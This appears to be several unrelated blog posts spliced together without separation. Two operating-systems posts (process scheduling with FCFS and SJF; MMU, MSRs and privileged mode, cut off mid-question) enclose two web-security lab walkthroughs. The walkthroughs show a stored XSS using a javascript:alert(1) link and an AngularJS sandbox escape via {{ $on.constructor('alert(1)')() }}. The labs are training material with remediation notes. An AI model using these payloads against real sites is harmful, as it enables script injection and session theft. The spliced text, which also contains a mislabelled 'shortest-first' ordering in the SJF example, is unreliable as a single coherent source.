⚠️ Where the Scheduler whispers, processes tremble — for it decides who runs… and who fades into starvation.

The following content ventures into the ticking heart of the OS — where time slices are bargained, queues grow restless, and scheduling algorithms silently wage war to minimize the average waiting time of every process.

Students and beginners, tread carefully — the Scheduler watches every move, counts every cycle, and never forgets who waited longest.

In this OS series, the focus remains on the Operating System (software context) components, not the hardware mechanics beneath them. (For the hardware side of CPU pipelines, caches, and context-switch machinery, refer to computer architecture.)

Special Thanks

Heartfelt gratitude to Mr. Adhakshoj Mishra Ji for his insightful session and for reviewing this blog.

A sincere thanks as well to the BreachForce Community Members for sharing their valuable notes, and to the BreachForce Community Volunteers for helping collate and refine this content.

Preface

In the last blog, we explored how Privileged Mode emerged inside our MMU — how we designed SPI, MSRs, and dedicated interrupt handlers to enforce strict control, protect critical system state, and ensure the kernel always remained safely isolated from user processes.

In this blog, we’ll uncover the depths of process scheduling by walking through a series of problems and exploring their possible solutions. As we refine each idea, we’ll naturally encounter subtle design caveats—tiny scheduling dilemmas that demand their own mini-solutions. Through these iterations, we’ll slowly sculpt and evolve our vision of what an ideal scheduler should look like.

Important Terminologies

• Process: A program in execution with its own memory space.

• Task: A generic term that may refer to either a process or a thread, depending on the OS design.

  In this blog, the words process and task will be used interchangeably.

• Job: A job is a unit of work submitted to the operating system for execution, typically representing a process before it enters the ready queue.

• CPU Cycle: The smallest unit of time in which the CPU performs operations; scheduling algorithms often treat each cycle (or a group of cycles) as the basic time quantum for executing processes.

• Waiting Time: The total time a process spends in the ready queue waiting before it gets CPU time for execution. It excludes actual CPU run time and I/O time

• Process Queue: A data structure used by the operating system to organize and manage processes based on their current state - such as the ready, waiting/blocking, or **terminated -**allowing the scheduler to decide which process should run next.

Process Scheduling

• In the 1980s, computers were extremely expensive, and computational resources were limited. The primary goal was to complete as many tasks as possible using the available hardware efficiently.

• When designing an Operating System, our focus should revolve around two key aspects:

  • Accuracy of the Program: This responsibility lies with the developer. The program running on the CPU is assumed to be tested, verified, and trusted by users. The OS does not alter program logic; it simply executes it.

  • Efficiency of the Program: This refers to minimizing the total time a process takes to complete. Higher efficiency allows the CPU to perform more work in less time.

• To increase efficiency, we aim to complete tasks in the shortest possible time.

• To achieve this, we must minimize the waiting time of processes during scheduling and context switching, because freeing the CPU as soon as possible allows more tasks to be completed.

• This is why we design a Process Scheduling Algorithm, supported by a process queue, to ensure that tasks are executed efficiently and system resources are utilized optimally.

Problem - How to reduce overhead while executing processes?

• When multiple processes run concurrently, the system eventually reaches a point where it must pause accepting new processes so that the currently running ones can complete.

• Beyond this saturation point, the OS can no longer accommodate new processes in the process queue without degrading performance.

• Therefore, our goal is to determine a threshold - after how many processes should the scheduler temporarily stop accepting new tasks to prevent system overload.

• To better understand this problem, consider the following analogy:

  • Why are NEFT and RTGS transactions processed in batches, while IMPS transactions are processed instantly - even though the underlying transaction data is essentially the same?

Solution - Batch them at once

• For any running process, we generally encounter two scenarios:

  • Case 1: The preparation time for the process is negligible (i.e., the overhead is minimal). In this case, we can process tasks immediately as they arrive.

  • Case 2: There is significant overhead associated with preparing or validating the process (for example, correlating data with other fields before execution).

• If there is no overhead, we follow the Case (1) approach: execute processes as they come.

• However, if the overhead is substantial—as in Case (2)—then whether we run 100 processes or 1000 processes, the preparation overhead remains roughly the same.

• In such situations, it becomes more efficient to batch all the operations together and handle the overhead once rather than repeatedly.

• This is exactly why banks use the NEFT/RTGS approach.

• Batching reduces overhead, improves efficiency at scale, and prevents system overload caused by continuous individual requests.

Problem — How do we implement batching in Process Scheduling?

• Before proceeding, let us assume:

  • We have a single computer with one CPU, one RAM module, and one storage device.

  • We have a list of jobs that need to be executed.

• The key question is: What is the most efficient way to execute these jobs?

Solution — Implement First Come First Served (FCFS)

• For the jobs we want to execute, two major scenarios arise:

  • Case 1: Jobs have little to no preparation overhead.

    • In this situation, we can execute jobs immediately as they arrive.

    • This approach is known as the First Come First Served (FCFS) scheduling algorithm.

  • Case 2: Jobs have significant preparation overhead, but the overhead does not depend on how many jobs are being processed (assuming the jobs are similar).

    • In this case, it is more efficient to batch the jobs and handle the overhead only once.

    • After batching, we can run FCFS on the batch itself.

    • Example: NEFT and RTGS transactions in banks — they are processed in bulk to minimize repeated overhead.

• There are two ways to perform batching:

  • Method 1: Time-based batching

    • Wait for a fixed time window.

    • All processes that arrive during this window are grouped into a batch and executed together.

  • Method 2: Count-based batching

    • Wait until a minimum number of jobs arrive.

    • Once the threshold is reached, batch them and execute them at once.

• For simplicity, let us choose Method 1 (time-based batching).

• Assume a batching window of 15–30 minutes.

• When batching is used, the order of jobs inside the batch does not matter, because the entire batch will take the same overhead time and be processed together (e.g., a fixed 10-minute overhead).

Problem — How to Reduce Average Waiting Time?

• The main challenge here is: How do we reduce the average waiting time of all jobs?

• Why do we care about minimizing average waiting time?

  • It improves overall user experience.

  • It provides a competitive marketing advantage (faster systems feel better).

  • The end-user does not understand OS internals — they only perceive how long things “feel.”

• Let us consider three jobs with the following execution times:

  • J1: 5 minutes

  • J2: 3 minutes

  • J3: 2 minutes

  • Total execution time: 10 minutes (this value will remain constant regardless of ordering)

• The question now becomes: How can we reduce the average waiting time of these three jobs?

Solution — Implement Shortest Job First (SJF)

• We can reduce waiting time by reordering the jobs intelligently instead of running them in the order they arrive.

• Using the earlier example, consider the following two possible orderings:

  • Ordering 1: J1 → J2 → J3

    • Waiting times

      • J1 = 0

      • J2 = 5

      • J3 = 8

    • Average waiting time

      • (0 + 5 + 8) / 3 = 13 / 3 ≈ 4.3 minutes → 4 minutes (approx)

  • Ordering 2: J2 → J3 → J1

    • Waiting times

      • J2 = 0

      • J3 = 3

      • J1 = 5

    • Average waiting time

      • (0 + 3 + 5) / 3 = 8 / 3 ≈ 2.67 minutes → 3 minutes (approx)

• Notice that in both cases, the total execution time remains the same: 10 minutes.

• But by simply reordering the jobs, we significantly reduce the average waiting time.

• Therefore, the optimal strategy is to execute shorter jobs first.

• This leads us to our second scheduling algorithm:

  • Shortest Job First (SJF)

    • An algorithm that minimizes average waiting time by always selecting the job with the shortest execution time.

• If larger jobs run first, smaller jobs end up experiencing unnecessarily long waiting times.

• Reorder the jobs so that smaller jobs execute first, thereby reducing the waiting time for larger jobs. This is the essence of the Shortest Job First (SJF) algorithm.

• But the Shortest Job First has some caveats. Let’s understand them one by one using a question-answer methodology.

Question 1 - When can SJF reduce the average waiting time?

Answer

In all cases except one:

When all jobs require the same amount of time, every ordering results in the same waiting time.

Otherwise, SJF always reduces the average waiting time.

Question 2 - Is there any other scheme that guarantees the shortest average waiting time?

Answer

Currently, none apart from SJF.

SJF is mathematically proven to produce the optimal (minimum possible) average waiting time.

Take-home assignment:

Prove that SJF yields the minimum average waiting time among all deterministic scheduling strategies.

Question 3 - Can we estimate waiting time without knowing the actual value?

Answer

Yes.

We can estimate execution time based on CPU cycles required by the job.

Question 4 - How do we estimate execution time beyond CPU cycles?

Answer

By counting the total number of CPU instructions the job must execute.

Question 5 - How do loops and control statements affect this estimation?

Consider two jobs, J1 and J2, both with:

• Same number of instructions

• Same number of loops

How do we determine which one will take more time to execute?

Answer

We cannot know without actually running them.

This is fundamentally limited by the Halting Problem -

We cannot predict a program’s exact runtime or behavior in all cases without executing it.

Thus, runtime estimation becomes impossible for arbitrary programs.

Question 6 - Consider a simpler case:

Two jobs J1 and J2 with:

• Same number of instructions

• No loops

• No branching

Will they take the same time? or different time? or something else will occur?

Answer

Not guaranteed.

Runtime can differ due to:

• Presence of I/O instructions

• Location of the file being accessed

• Type of storage device (SSD, HDD, tape, RAM disk, etc.)

• Storage latency and hardware constraints

In short: CPU instruction count alone is not enough to determine execution time.

Conclusion

• If I/O is involved, predicting execution time becomes uncertain.

• That means SJF will only be applicable on operations which are very defined for which we know how much time it will take for the job to complete.

• That means for general purpose instructions where time taken to complete the job is not defined, SJF will fail.

• Therefore. SJF can only be implemented on jobs where time taken to complete is fully defined.

• Now for process scheduling we need new algorithm which can satisfy the following cases:

  • Case 1: It should not be dependent on waiting time of job.

  • Case 2: The overall performance of the algorithm should not be negatively impacted if a job takes too much time to execute (i.e. the waiting time of a job increases).

• Only then can an OS handle general-purpose computing instead of specialized workloads.

Coming Up Next

• In the next lecture, we will study the Round Robin (RR) algorithm, its caveats, and approaches to fixing them.

• We will then explore how scheduling works in Modern Operating Systems, including:

  • Feedback loops

  • Priority queues

Additional Context

• Processes often do not know their exact memory requirements in advance. They receive a fixed virtual address space, but must manage it carefully using:

  • Memory allocators

  • Garbage collectors

  • Kernel/user memory boundaries

• Additionally, the OS may overcommit memory and must use mechanisms like the OOM-Killer to maintain system stability.

• The primary goals are:

  • Ensuring safe memory usage

  • Avoiding unnecessary process termination

This lab contains a stored cross-site scripting vulnerability in the comment functionality.

Task

To solve this lab, submit a comment that calls the alert function when the comment author name is clicked.

Methodology

• Add the Target URL in Burpsuite Scope

• This is our target website

  

• As per the description, the XSS vulnerability is present in the comment section

• Click on any post. Scroll down to the comment section. Open the dev console.

• Lets add a new comment in the comment section of the blog as shown in the below image

  

• After that, go back to the blog to view the newly added comment

  

• Lets check the comment author name where the XSS vulnerability might be present

• Analyze the comment author name and view its code in the inspector tab

  

• As seen in the above image, the href attribute stores the Website form parameter. It stores them as a hyperlink (which is clear from the <a> tag)

• If we click on the comment author name, we would be redirected to the hyperlink inside the href attribute

• So, if we want to trigger XSS, we have to store the payload inside the href attribute

• Here, we can use the concept of Hierarchical and Non-Hierarchical URLs

  • Hierarchical URL:

    • They follow the structure scheme://authority/path?query#fragment

    • Example: https://example.com/path/to/page

  • Non-Hierarchical URL:

    • No //authority part — structure depends entirely on the scheme definition.

    • Example: javascript://

Note: A short summary will be given for the concept of Hierarchical and Non-Hierarchical URLs above. For further explanation, kindly visit the bottom of the current page

• We can use the javascript:// - non-hierarchical URL to run inline JavaScript code. It’s used to execute JavaScript directly when a link or address bar is used.

  • Example:

      javascript:alert('Hello World');
    

  • When this URL is visited (for example, in a browser address bar or <a href>), the browser executes the JavaScript code instead of loading a page.

• Using the above information, we will now create the below XSS payload

    javascript:alert(1);
  

• Lets add this payload inside the Website link form parameter by creating a new comment. Click on the Post Comment button

  

• As soon as we submit the comment, we can see a notification that we have successfully solved the lab

  

• Lets try to invoke the XSS payload stored inside the href attribute of the comment author name inside the <a> tag

• We will go back to the blog and analyze the author name hyperlink

  

• As seen in the above image, the Stored XSS Payload has successfully saved inside the href attribute

• To invoke the payload, click on the comment author name Wolf3

  

• We have successfully triggered Stored XSS on the target website

• Using the above payload, we have used the non-hierarchical URL javascript:// to run inline javascript code inside the href attribute of the <a> tag belonging to the comment author name. Thereby, executing a Stored XSS on the target website

Hierarchical v/s Non-Hierarchical URL

URL classification in RFC 3986

According to RFC 3986 (Uniform Resource Identifier: Generic Syntax),

URLs (URIs) can be broadly categorized as:

Structure of a hierarchical URL

Hierarchical URLs have this general pattern:

<scheme>://<authority><path>?<query>#<fragment>

Example:

<https://example.com/blog/article?id=10#comments>

Here:

• scheme = https

• authority = example.com

• path = /blog/article

• query = id=10

• fragment = comments

Because of this structured layout, these URLs can be resolved relative to one another, e.g.,

/blog/article relative to https://example.com → hierarchical traversal is possible.

Structure of a non-hierarchical URL

Non-hierarchical URLs omit the authority and path entirely.

They don’t follow the // or / folder structure.

Instead, the content after the scheme is directly defined by that specific protocol’s syntax.

Examples:

All of these are defined independently of hierarchical syntax — they don’t have //authority or path.

How browsers parse non-hierarchical URLs

When a browser sees a URL:

scheme:something

it checks whether the scheme’s definition uses hierarchical syntax or non-hierarchical syntax.

If the scheme is non-hierarchical, the browser:

1. Skips the authority and path parsing steps.

2. Passes the rest of the text (after the colon) directly to that protocol’s handler.

3. Executes the handler defined in the browser or OS.

Example breakdown

mailto:logan@example.com

• Scheme: mailto

• Remainder: logan@example.com

• Browser action: Open mail client with “To” filled in.

javascript:alert(1)

• Scheme: javascript

• Remainder: alert(1)

• Browser action: Execute code in page context.

Security considerations

Because non-hierarchical schemes bypass normal navigation and go straight to browser handlers:

• javascript: can lead to XSS or bookmarklet abuse.

• data: can embed inline malicious payloads.

• mailto: and tel: can be used in phishing/social engineering.

Hence, modern browsers restrict them:

• Many contexts block javascript: URLs (inside iframe, a href in sandboxed pages, etc.).

• CSP (Content Security Policy) can disable javascript: entirely via script-src.

This lab contains a DOM-based cross-site scripting vulnerability in a AngularJS expression within the search functionality.

AngularJS is a popular JavaScript library, which scans the contents of HTML nodes containing the ng-app attribute (also known as an AngularJS directive). When a directive is added to the HTML code, you can execute JavaScript expressions within double curly braces. This technique is useful when angle brackets are being encoded.

Task

To solve this lab, perform a cross-site scripting attack that executes an AngularJS expression and calls the alert function.

Methodology

• Add the Target URL in Burpsuite Scope

• Lets identify the framework and its version for the current website

  

• As seen in the above image, the website is running AngularJS 1.7.7

• AngularJS below 1.7.8 and above 1+ use the $scope method which is used to bind data between controller and view (DOM)

• It plays a key role in the two-way data binding mechanism.

• When a controller sets values on $scope, all DOM elements that use that controller automatically get access to those properties and methods.

• $scope follows a prototypal inheritance model.

Note: AngularJS evaluates expressions in the context of $rootScope if no controller binding exists.

• Any property or methods defined in the controller is accessible to the DOM elements inside that controller’s scope.

• The catch is

  Even if no properties are explicitly bound in the DOM, the DOM nodes (via AngularJS directives like ng-controller, ng-repeat, etc.) are still under the influence of the $scope object from the controller.

• So, even if a DOM node doesn’t use any {{ expression }} or directive, the scope still applies and exists for it — it's just not visible until you tap into it.

• Because of JavaScript’s prototypal inheritance, any HTML node under an AngularJS controller:

  • Gets associated with a scope object, and

  • That scope object inherits from $rootScope, which provides built-in methods like:

    • $eval()

    • $on()

    • $watch()

    • $emit()

    • $broadcast()

• Even if the DOM element doesn't use {{ }} or bind any model, as long as it's within the controller's scope, it inherits those scope methods through the prototype chain.

• Based on this logic, let us construct our payload

    {{ $on.constructor('alert(1)')() }}
  

  • $on is a function (defined on the prototype of $rootScope).

  • In JavaScript, all functions are objects, and all function objects have a .constructor property.

  • So when you do:

      $scope.$on.constructor
    

  • You're accessing the .constructor property of the $on function object

  • This returns the native Function constructor:

      console.log($scope.$on.constructor === Function); // ✅ true
    

  • $on.constructor('alert(1)') — Evaluates to a function equivalent to new Function('alert(1)')

  • (): Immediately invokes that function

  • Because, In JavaScript, functions are first-class objects, and you can:

    • Create a function dynamically (e.g., via Function constructor)

    • Call it immediately using () — even in the same line

• Let’s execute the payload in the search bar of the website

  

• After successful execution of the JS exploit, the lab will be solved

  

• Using the above payload, we were able to leverage prototypal inheritance in JavaScript to access the $on method, retrieve its .constructor (which points to the native Function constructor), and dynamically create a new global function.

• By appending () at the end, we immediately invoked the generated function, which executed the alert() call — resulting in an alert popup, all within a single line of code.

• In summary, AngularJS expressions can be abused when user-controlled data is processed by the Angular template engine. By leveraging prototype inheritance and accessing the Function constructor through $on.constructor(), an attacker can escape AngularJS sandboxing and execute arbitrary JavaScript.

Remediation

• Use AngularJS 1.8.0+ patched sandbox

• Disable expression evaluation (strictContextualEscaping)

• Use Content Security Policy (CSP)

• Sanitize user input before rendering

Sandboxing in AngularJS

Why {{ }} Is Used in AngularJS

AngularJS uses double curly braces ({{ }}) for expression binding, also known as interpolation.

This syntax allows dynamic values to be inserted into the DOM based on JavaScript expressions evaluated by AngularJS. It enables the view (HTML) to reactively display data managed by the controller.

Example:

<p>Hello {{ username }}!</p>

If $scope.username = "Logan" in the controller, AngularJS replaces the placeholder dynamically with:

Hello Logan!

It can also evaluate JavaScript expressions:

{{ 2 + 2 }}           → 4
{{ username.toUpperCase() }} → LOGAN

Key points:

• {{ }} acts like a safe, mini expression parser.

• It updates automatically when scope values change (two-way binding).

• It avoids writing full <script> tags inside HTML.

This mechanism improves templating — but also becomes dangerous when user input is parsed as an expression, leading to AngularJS-based XSS.

What Is AngularJS Sandboxing?

AngularJS includes a sandbox, which is a restricted execution environment designed to prevent template expressions from running arbitrary JavaScript.

In theory, this means expressions inside {{ }} should only access a limited safe subset of functions - NOT the entire DOM or global JavaScript environment.

For example, the sandbox is meant to allow:

{{ 1 + 1 }}  ✔
{{ user.name }} ✔

But block:

{{ alert(1) }} ❌
{{ constructor.constructor('alert(1)')() }} ❌

However — earlier AngularJS versions (including 1.7.7, as in this lab) had sandbox escape vulnerabilities. By abusing prototype inheritance and accessing internal function constructors, attackers can bypass the sandbox and execute real JavaScript.

So the payload:

{{ $on.constructor('alert(1)')() }}

works because it breaks out of the sandbox and executes code in the page’s JavaScript context -effectively turning a harmless template expression into a stored or reflected XSS.

CSTI: The Origin of This Vulnerability Class

This behavior led to the emergence of a new type of security issue known as Client-Side Template Injection (CSTI).

In AngularJS and other JavaScript frameworks that support client-side templating, user-controlled input may be interpreted as executable template code rather than plain text. When untrusted data reaches the Angular interpolation engine ({{ }}), attackers can inject expressions and begin interacting with the framework:

{{ 7*7 }} → CSTI detection

From there, chaining prototype abuse with sandbox bypass techniques allows escalation to full script execution:

{{ $on.constructor('alert(1)')() }} → XSS

⚠️ Where the MMU walks, addresses shiver — for it decides which memories live… and which are exiled to the void.

The following content dives deep into the shadows of system memory — where addresses deceive, and pages guard their secrets.

Students and beginners, proceed at your own risk — the MMU remembers everything you do.

In this OS series, the focus will be on the Operating System (software context) components, not the hardware context of the components. (For the hardware context, refer to computer architecture.)

Special Thanks

Heartfelt gratitude to Mr. Adhakshoj Mishra Ji for his insightful session and for reviewing this blog.

A sincere thanks as well to the BreachForce Community Members for sharing their valuable notes, and to the BreachForce Community Volunteers for helping collate and refine this content.

Preface

In the last blog, we explored how the Memory Management Unit (MMU) was born - what challenges it solved, how it reshaped the way systems handle memory, and how it paved the way for powerful abstraction layers that give us fine-grained control over both the CPU and RAM.

Now in Part-2, we’ll explore a series of problems along with their possible solutions. As we introduce these solutions, we’ll inevitably encounter smaller sub-problems—which we’ll resolve using their own mini-solutions. With each refinement, we’ll iteratively evolve and improve our overall design.

One such problem is this: a process might overwrite the abstraction layer tables (page tables) if proper safeguards aren’t implemented. So how do we prevent that from happening?

MMU

Problem: How do we Prevent Accidental Over-write?

• In the last blog, we allowed our Meta-Program (the early OS) to configure the address translation tables. But this introduces a serious issue: if the Meta-Program can do it, any other user process could also attempt to modify these tables.

• How do we prevent untrusted processes from tampering with the memory translation mechanism?

  • ❌ No normal user process can modify MMU tables
    ✔ Only the OS (Meta-Program) can do it safely

Solution

Solution 0: Merge the Abstraction Layer Into the CPU

It is time to do something with the CPU and the Meta-program to solve the above problem.

• We will merge the Abstraction Layer (MMU) into the CPU because:

  • It is not possible to directly upgrade the CPU.

  • The abstraction layer logically sits closer to the CPU than RAM.

  • It is easier to give it special interconnect, than fiddling with general purpose interconnect. And less chances of things going wrong

Note: Interconnect is the hardware wiring or communication pathway that links different components inside a CPU or system so they can exchange data and signals.

Therefore, no separate buses for communication between CPU → Abstraction Layer and Abstraction Layer → RAM will be needed

• Now, the definition of CPU changed to a CPU Model.

Design Architecture: Modern CPU Model (CPU + Abstraction Layer)

• We have finally created a CPU Model which stored the Abstraction Layer (MMU) inside it.

Problem 1: No Separate Bus between CPU and Abstraction Layer

• Without using the general-purpose buses, how will the CPU communicate with the Abstraction Layer (MMU)?

• We need to have some sort of communication between CPU and Abstraction Layer for the Abstraction Layer to do its job as we are not using the General Purpose Interconnect, because

  • Any instruction could possibly access it

  • User processes could accidentally or intentionally misuse it

• We need to have some special purpose interconnect.

Solution 1: Introduction of Special Purpose Interconnect (SPI)

• We have established a special interconnect between the CPU and Abstraction Layer.

• With this, the Interconnect has been divided into

  • General Purpose Interconnect: A shared, standard data pathway used by the CPU to communicate with memory and most hardware.

  • Special-Purpose Interconnect: A private, restricted hardware pathway inside the CPU that normal instructions cannot access.

• The SPI lets the CPU talk to the MMU securely

• This has again created a new problem for us.

Problem 2: No Special Instructions between CPU and the Abstraction Layer

• The SPI is private, existing general-purpose instructions cannot communicate with the Abstraction Layer through the special-purpose interconnect as they don’t know how to use it.

• So, we need a clean way to separate normal instructions from those that perform privileged, hardware-level operations.

• This raises a design question:

  Can we add a dedicated unit inside the CPU that understands, stores, executes, and protects these special instructions?

Solution 2: Introduction of Model Specific Registers (MSR)

To solve this problem, we introduce a new class of registers called Model Specific Registers (MSRs).

• MSRs are special registers whose presence, purpose, and count vary from CPU model to CPU model (hence the name Model Specific).

  CPU vendors document these in their datasheets, and OS developers must consult these to understand the available MSRs.

• These MSRs act as a dedicated interface between the CPU and the Abstraction Layer, and only special-purpose instructions are allowed to read/write them.

• To ensure general-purpose instructions cannot accidentally or intentionally modify these sensitive registers, we introduce new special instructions:

  • RDMSR - Read data from an MSR

  • WRMSR - Write data into an MSR

• These special instructions prevent accidental overwrites by user-mode software, and old software continues to run safely, since it has no knowledge of these new instructions.

• However, if a malicious or “oversmart” developer tries to use RDMSR or WRMSR inside normal programs, the CPU will:

  • Trigger a fault or interrupt,

  • Hand control back to the Meta-Program (OS),

  • Which can then decide whether to kill the misbehaving process or silently handle it.

  • Importantly, we cannot expose these special opcodes as normal memory-mapped instructions - that would require fixing rigid address ranges inside the OS, leading to immense space complexity and unmaintainable designs. We will explore more on this at the end of the blog.

Thus, MSRs and their special instructions together:

• Compute privileged values

• Store critical configuration data

• Load those values back into the CPU

• Act as a secure hardware control interface for the Meta-Program (OS)

But once again, adding MSRs introduces a new challenge for us.

Problem 3: How Does the CPU Know Who Is Allowed to Run Special Instructions?

• Older software will simply never invoke RDMSR or WRMSR - these instructions didn’t exist back then. So they naturally stay safe.

• But what about new modern software that can attempt to execute these special instructions?

• How will the CPU differentiate between:

  • trusted Meta-Program (which should be allowed), and

  • normal user programs (which must be blocked)?

Solution 3: Introduction of Privilege Mode

• We cannot base our solution on:

  • address ranges

  • Hard-coded memory locations

  • or page-table tricks

• Such approaches create massive space complexity and unmaintainable OS designs.

• Instead, we need something simpler and more reliable.

• We solve this in three steps:

Step 1: A Flag Inside the CPU to Identify the Meta-Program

• We introduce a special privilege flag inside the CPU.

• The instruction decoder will check this flag before executing any special-purpose instruction.

• If the flag is set → the instruction is allowed

• If the flag is unset → the CPU triggers a fault/interrupt

• This ensures that:

  • General programs cannot execute privileged instructions

  • Only the Meta-Program (OS kernel) can

  • Misbehaving processes will be immediately terminated or trapped

• This is much cleaner than creating fixed memory regions or address-based gating.

Step 2: Use Interrupts to Switch Into the Meta-Program

• Only the Meta-Program (OS) can register interrupt handlers.

• So when a user program tries to execute RDMSR or WRMSR:

  1. The CPU sees the flag is not set

  2. The CPU raises an interrupt / trap

  3. The interrupt handler registered by the Meta-Program runs

  4. The Meta-Program decides whether to:

     • kill the process

     • log it

     • emulate the behavior

     • or deny access

• This gives us a natural mechanism for control.

Essentially: Triggering an interrupt = entering the Meta-Program.

This gives full control to the OS at all times.

Step 3: Using the Meta-Program to reset the flag

Whenever the OS switches into kernel code:

set privilege flag = ON

Whenever it returns to user mode:

clear privilege flag = OFF

So,

• During context switching:

  • Before running kernel code → set the privilege flag

  • Before resuming a user process → clear the privilege flag

• This ensures:

  • Special instructions only run in the Meta-Program

  • User processes always run with privilege flag OFF

  • The kernel cannot accidentally “leak” privilege into user mode

When the system boots:

• The bootloader loads the Meta-Program (OS)

• The OS sets the privilege flag

• Execution continues with full control

• The OS then switches CPU into the appropriate CPU mode

  • 8086 → Protected Mode (32-bit)

  • Protected Mode → Long Mode (64-bit)

Using the above approach, we just invented Privileged Mode

Categories of Instructions in CPU

• By adding this privilege flag check, we have effectively created two types of instructions inside the CPU:

  1. General-Purpose Instructions

     • Normal instructions

     • Execute regardless of privilege flag

     • Available in user mode

  2. Special-Purpose Instructions

     • Privileged operations (RDMSR, WRMSR, I/O instructions, etc.)

     • Execute only when privilege flag is ON

     • Otherwise trigger an interrupt

• This separation is the foundation of user mode vs kernel mode in all modern CPUs.

• Special-Purpose instructions can be used to switch from user mode to kernel mode.

Privileged Mode

• Putting this all together:

  • A privilege-identifying CPU flag

  • An instruction decoder that checks the flag

  • Interrupts that hand control to the Meta-Program

  • Special instructions restricted to privileged code

  • Kernel sets/clears the flag during context switches

Congrats, this is Privileged Mode. The CPU now distinguishes between user mode and kernel mode.

• User Mode → normal code

• Kernel Mode → privileged operations

Even I/O operations are restricted using this same mechanism

We have successfully dealt with the accidental over write problem completely

How Real Systems Implement Privileged Mode

Different architectures expose privilege mode switching through different mechanisms:

• 32-bit systems

  • int 0x80 → switch from user mode → kernel mode

  • iret → return from kernel mode → user mode

• 64-bit systems

  • syscall / sysenter → enter privilege mode

  • sysret / sysexit → return to user mode

This is exactly how Linux, Windows, BSD, macOS, and every modern OS operate. The privileged mode gave birth to another problem.

Problem: What happens when older Meta-Program boots?

When we introduce MSRs and special instructions like RDMSR and WRMSR, the CPU now expects the Meta-Program (OS) to perform extra setup before these instructions can be safely used:

• Initialize MSRs

• register interrupt handlers

• configure privilege mode

• set the privilege flag

• prepare CPU control structures

A modern OS understands these requirements and configures everything properly.

But older Meta-Programs:

• don’t know MSRs exist

• don’t know these new instructions(RDMSR/WRMSR) exist

• don’t register the required handlers

• don’t configure privilege flags

• don’t perform any of the required setup

So if the CPU were to boot directly into the new privileged architecture, an older OS would:

• fail instantly

• get stuck on an unexpected MSR access

• crash due to missing handlers

• or fall into undefined behavior

We have 2 options now:

• Either we can kiss Old meta-programs good bye and enrage our users.

• Or We can try to maintain some backwards compatibility.

Solution: Boot the CPU in Legacy Mode

We have 2 approaches, to solve this problem:

• Either we boot the CPU in legacy mode.

• Or the Meta-program unintentionally switches to newer mode.

To avoid breaking older Meta-Programs, the CPU must not start directly in the new privileged architecture.

Instead, we maintain backward compatibility by doing the following:

• Start the CPU in Legacy Mode, where it behaves exactly like older CPUs.

  • In this mode, none of the new privileged features (MSRs, special instructions, privilege checks) are active.

• Provide additional configuration options that allow a modern Meta-Program (OS) to intentionally switch the CPU into the newer mode, where:

  • privileged vs non-privileged distinction exists

  • MSRs become active

  • special instructions like RDMSR/WRMSR are enforced

  • the privilege flag is checked by the instruction decoder

This design ensures that:

• Old Meta-Programs continue to run normally without crashing

• Newer Meta-Programs can access and benefit from modern CPU features whenever they choose to enable them

• but because we delegated all controls to Interrupts, we now face another problem.

Problem: Any Process Can Trigger Interrupts - How Do We Protect Privileged Handlers?

In our design so far, any process (user-mode or Meta-Program) can execute an interrupt instruction.

But interrupts always jump directly into the Meta-Program (OS), because only the Meta-Program has registered interrupt handlers.

This creates a new risk:

• If all interrupts enter the Meta-Program, how do we prevent user processes from triggering sensitive or privileged interrupts?

If we do nothing, a malicious program could:

• try to reach MSR-related interrupt handlers

• attempt to run privileged sequences

• modify CPU configuration

• bypass privilege checks

• or crash the system

We need a mechanism to decide which interrupt handlers a normal process is allowed to invoke, and which ones must remain exclusive to the Meta-Program.

Solution: Categorizing Interrupt Handlers into Public and Private

To solve this, we divide all interrupt handlers into two categories.

• Public Interrupts (Allowed for User Processes)

  • These are safe to expose:

  • Examples:

    • Normal software interrupts

    • System call entry points

    • Timer notifications

    • Basic, non-dangerous interrupts

  • A user-mode process can invoke these, because they do not give access to any privileged CPU state.

  • These are how normal programs request OS services.

• Private Interrupts (Restricted to the Meta-Program Only)

  • These must never be directly triggered by user processes:

  • Examples:

    • MSR-related handlers

    • Privileged configuration instructions

    • CPU mode-switching handlers

    • Memory-management and internal CPU traps

  • Anything that modifies or configures hardware state

  • If a user process tries to access these:

    • The CPU triggers a fault

    • The fault enters the Meta-Program

    • The Meta-Program kills or blocks the process

  • This guarantees the privileged parts of the system remain safe.

The CPU + Meta-Program enforce the separation using:

• Interrupt categories
• Access-control tables
• Privilege checks

Different entry gates for user vs kernel interrupts

Even though any process can execute an interrupt instruction, it will reach only the handlers the Meta-Program has allowed, and the CPU will block access to restricted handlers.

• User-mode programs can access safe, public interrupt handlers.

• Privileged interrupt handlers remain exclusive to the Meta-Program.

• Privilege mode and interrupt categories together ensure complete protection.

Additional Concepts

Important Concepts related to the Problem - Why MSRs Cannot Be Memory-Mapped

Before understanding the design problem, we need to clarify a few important terms:

Opcode (Operation Code)

• An opcode is the machine-level numeric code that tells the CPU which instruction to execute.

• Example: RDMSR, WRMSR, ADD, MOV - each has its own binary opcode.

Memory-Mapped Instruction / Memory-Mapped I/O

• A design where hardware devices or special registers are assigned addresses inside normal memory space, so software accesses them using regular load/store operations:

    mov eax, [0xFFFF_FF10]   ; read from device/register
  

• This works for I/O devices, but not for CPU control registers like MSRs.

Page Table

• A page table is a data structure used by the MMU to translate virtual addresses → physical addresses.

• It defines which parts of memory a program can access.

Per-Process Page Tables

• Every process gets its own page table, defining:

  • its own private virtual memory

  • its own mappings

  • its allowed permissions

  • what memory it is isolated from

• This is how modern OSes ensure process isolation and prevent memory leaks or corruption across processes.

• More mappings in page tables → more memory usage → higher space complexity.

Space Complexity (OS Context)

How much total memory the OS must reserve in:

• virtual address space
• physical memory
• each process’s page table

More reserved regions → heavier memory footprint → more complex memory layouts.

Unmaintainable Designs

A design becomes unmaintainable when:

• it requires hacks to keep working

• consumes too much address space

• complicates page tables and process isolation

• becomes fragile with new CPU models

• is difficult for OS developers to maintain or debug

Problem: Why MSRs Cannot Be Memory-Mapped

If MSRs were exposed as normal memory-mapped registers, the CPU would need to assign them fixed addresses like:

    0xFFFF_FF00 – 0xFFFF_FFFF → MSR region

This immediately creates serious architectural problems:

1. OS Must Reserve Permanent Address Ranges

The OS would be forced to permanently reserve these addresses across:

• the kernel’s virtual memory

• every process’s page tables (with allow/deny rules)

• physical memory layouts

This increases space complexity and pollutes the memory map.

2. Page Tables Become Bloated and Hard to Manage

• Every process would need to include these MSR addresses:

  • either mapped (for kernel use)

  • or marked as forbidden (for user mode)

• This makes per-process page tables larger, more complex, and less efficient.

• Extra entries → more TLB pressure → performance drop → more kernel bookkeeping → unmaintainable long-term.

• So what is TLB pressure?

